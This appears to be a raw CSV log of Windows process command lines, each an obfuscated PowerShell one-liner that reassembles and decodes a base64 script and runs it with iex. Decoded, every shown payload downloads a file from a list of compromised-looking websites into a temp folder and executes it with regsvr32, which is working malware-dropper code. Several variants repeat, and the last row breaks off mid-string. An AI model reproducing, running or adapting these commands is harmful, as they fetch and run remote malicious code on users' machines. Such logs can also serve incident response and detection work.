"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'1F2s5DumwmaTwf6+atwYRk2pBZnRcmxMwOGaJtehG55LRLudJ/SnkH6+qgv63mrGH+bxhSng';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'1MrMiPiraBi66SaCJ5uHjjcZUpjzb8x1mmdMAtwtfRvN91WTaGKEgrHwEX2ihEE3tGsfBgdN';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'2knBhWFxHNe1RKScIaoABSCGsHDqFLi/cKZwKDTwr2ygd8HcfDglegVH2zZ9H7L91nkVzwV/';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'ATNP1eMMzcJ6MGsgm8d0dVosY7B3nzcPTwC89awtWH3j1cKsN3Zt2r8Rd4WbAlHG14q4cS1L';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'BNsmZDuqXC+fms3TBh2SJWe53AFGKI7RdR/OmlWBcbUdTCbv+dMCy1he0nrpfuig2tvV5Roa';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'Bfuxhi80Hxxe2/w4EYfwjhrRnQwkgMNa++uZnr5q7QRrDXYmD0caFGzvwjYlN5HRs+V9gsHN';$poAqp='ICAgICAgICBXcml0ZS1Ib3N0ICJBbUpEWiI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW';$MYYKc='50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3Rvd29ya3MuY2EvcGhwbXlhZG1pbi9YLyIsImh0dHBzOi8vdmlldHJvbGwudm4vd3AtY29udGVudC9UUWRrUC8iLCJodHRwOi8vd2lldHNlZGV2cmllcy5ubC93ZWJzdGF0cy9TZUNQeWlRYmdtWllCTG93c29LZS8iLCJodHRwOi8vYnJlbm5hbmFzaWEuY29tL2ltYWdlcy9jUDhDTUJZNXF4MXUvIiwiaHR0cDovL2JhbmNoYW5uLmNvbS9wcm9kdWN0LzR5S2NMZWZsWVBCU3YxMS8iLCJodHRwczovL3RpbmVyaWlidWN1cmVzdGVuaS5yby93cC1pbmNsdWRlcy9ZQnlndy8iKTskdD0iUXlmWmd0clZ1IjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXFJsYWR1T0pETlYuSE5BO1JlZ3N2cjMyLmV4ZSAiJGRcUmxhZHVPSkROVi5ITkEiO2JyZWFrfSBjYXRjaCB7IH19';$sW=$poAqp+$MYYKc;$URKR=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($sW));$sW=$URKR;iex($sW)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'CgiPl8zNswx6P1PzIPf8sWO6qXbeO5KOgiO/b/7S5XilC0SDOISJB8+d5lLs6u+OJniJmA/i';$RIr='ICAgICAgIFdyaXRlLUhvc3QgIm9qeEZVIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbW92ZWlzcGxhbmVqYWRvcy5hcnQuYnIvd3A';$wRseQ='tYWRtaW4vRUJ4YlU3TWxJaE9NLyIsImh0dHA6Ly9zaWV1dGhpcGh1dHVuZ3hlbmFuZy5jb20vb2xkX3NvdXJjZS9HMWV4SFgwcll5di8iLCJodHRwczovL2tpbmdtb2RlLmlyL3dwLWFkbWluL1JsSS8iLCJodHRwczovL2tpbmdrb25ncGl6emEucnUvZm9udHMvNS8iLCJodHRwczovL21ld29sdGVycy5ubC90bXAvU3JKdS8iLCJodHRwczovL3d3dy5vbGFmcy1yYWRsYWRlbi5kZS9jYXB0Y2hhL3lDeEYyLyIpOyR0PSJRWlFIWW15IjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXFdsR1ZnSmdMRnMuUnZCO1JlZ3N2cjMyLmV4ZSAiJGRcV2xHVmdKZ0xGcy5SdkIiO2JyZWFrfSBjYXRjaCB7IH19';$dQnUE=$RIr+$wRseQ;$THsRjX=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($dQnUE));$dQnUE=$THsRjX;iex($dQnUE)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'Cz14a7ttVS3JfImZIGFXSiM6yUxWQA4lPkkw0oV4kdz92WCV/MR4o5OXPUN/PjRexr2p1m4U';$RIr='ICAgICAgIFdyaXRlLUhvc3QgIm9qeEZVIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbW92ZWlzcGxhbmVqYWRvcy5hcnQuYnIvd3A';$wRseQ='tYWRtaW4vRUJ4YlU3TWxJaE9NLyIsImh0dHA6Ly9zaWV1dGhpcGh1dHVuZ3hlbmFuZy5jb20vb2xkX3NvdXJjZS9HMWV4SFgwcll5di8iLCJodHRwczovL2tpbmdtb2RlLmlyL3dwLWFkbWluL1JsSS8iLCJodHRwczovL2tpbmdrb25ncGl6emEucnUvZm9udHMvNS8iLCJodHRwczovL21ld29sdGVycy5ubC90bXAvU3JKdS8iLCJodHRwczovL3d3dy5vbGFmcy1yYWRsYWRlbi5kZS9jYXB0Y2hhL3lDeEYyLyIpOyR0PSJRWlFIWW15IjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXFdsR1ZnSmdMRnMuUnZCO1JlZ3N2cjMyLmV4ZSAiJGRcV2xHVmdKZ0xGcy5SdkIiO2JyZWFrfSBjYXRjaCB7IH19';$dQnUE=$RIr+$wRseQ;$THsRjX=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($dQnUE));$dQnUE=$THsRjX;iex($dQnUE)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'DF9+pL4wmmTrYbKtSgCUyhL97DoIOqnfErPIR2X3B4GG1cYd6JLDw2oO5jzORNHRxmzi+Kvc';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'ERnmpf3VvYsnTupWLIklLEH1WCZ3JJ9syqtvqsreC8J0N4cQ4zVmcyKMl3Ii2Vx3knSwHmPH';$RIr='ICAgICAgIFdyaXRlLUhvc3QgIm9qeEZVIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbW92ZWlzcGxhbmVqYWRvcy5hcnQuYnIvd3A';$wRseQ='tYWRtaW4vRUJ4YlU3TWxJaE9NLyIsImh0dHA6Ly9zaWV1dGhpcGh1dHVuZ3hlbmFuZy5jb20vb2xkX3NvdXJjZS9HMWV4SFgwcll5di8iLCJodHRwczovL2tpbmdtb2RlLmlyL3dwLWFkbWluL1JsSS8iLCJodHRwczovL2tpbmdrb25ncGl6emEucnUvZm9udHMvNS8iLCJodHRwczovL21ld29sdGVycy5ubC90bXAvU3JKdS8iLCJodHRwczovL3d3dy5vbGFmcy1yYWRsYWRlbi5kZS9jYXB0Y2hhL3lDeEYyLyIpOyR0PSJRWlFIWW15IjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXFdsR1ZnSmdMRnMuUnZCO1JlZ3N2cjMyLmV4ZSAiJGRcV2xHVmdKZ0xGcy5SdkIiO2JyZWFrfSBjYXRjaCB7IH19';$dQnUE=$RIr+$wRseQ;$THsRjX=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($dQnUE));$dQnUE=$THsRjX;iex($dQnUE)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'F+be5lgvkJc0YMUukkxCbv0ZT8/BRhM2TtoQw5U8WRv6xk6Eg3c1g5YuCI39M9AHO2avq6Br';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'GNIlob323Mrbk6o51sW1B1MOPZQKSHdce4/S+52ZE+xIJ4KJXUeIzAyhPCU88hH+wWEBqZ+W';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'I63880eyMAVNhP7dqAlXkUGpXhNklJyGXiG73ChjvDUktGm1UpRcuo6/e6uUVl9NPNIlc0F0';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'JZE3WvHNGtpwh6hfdRNtplPQp39tM0O7AphrMlynx8KhHWqA2bPr0TH1N+Da+AvfYO8LX7qi';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'JsD3OFZhH8QZSbRMuuehgmUReVpN8uejmzy8dvBwFO6rL5kRxn6zHdY5yjPK9/l/jlVwMj9Z';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'L5RN4GZV7RJXxpVup1CRTVNTceE8VG7q+7qm6nWJCqKgxYnwV6yEe8aBKG4wNVudcG1NSKlR';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'LbppcdwxJNDZu3mktoJUaQ7zFe+po2txR5j3ad4RRNO8wbUTA+R4z/0JQhVo37vUYFZymaou';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4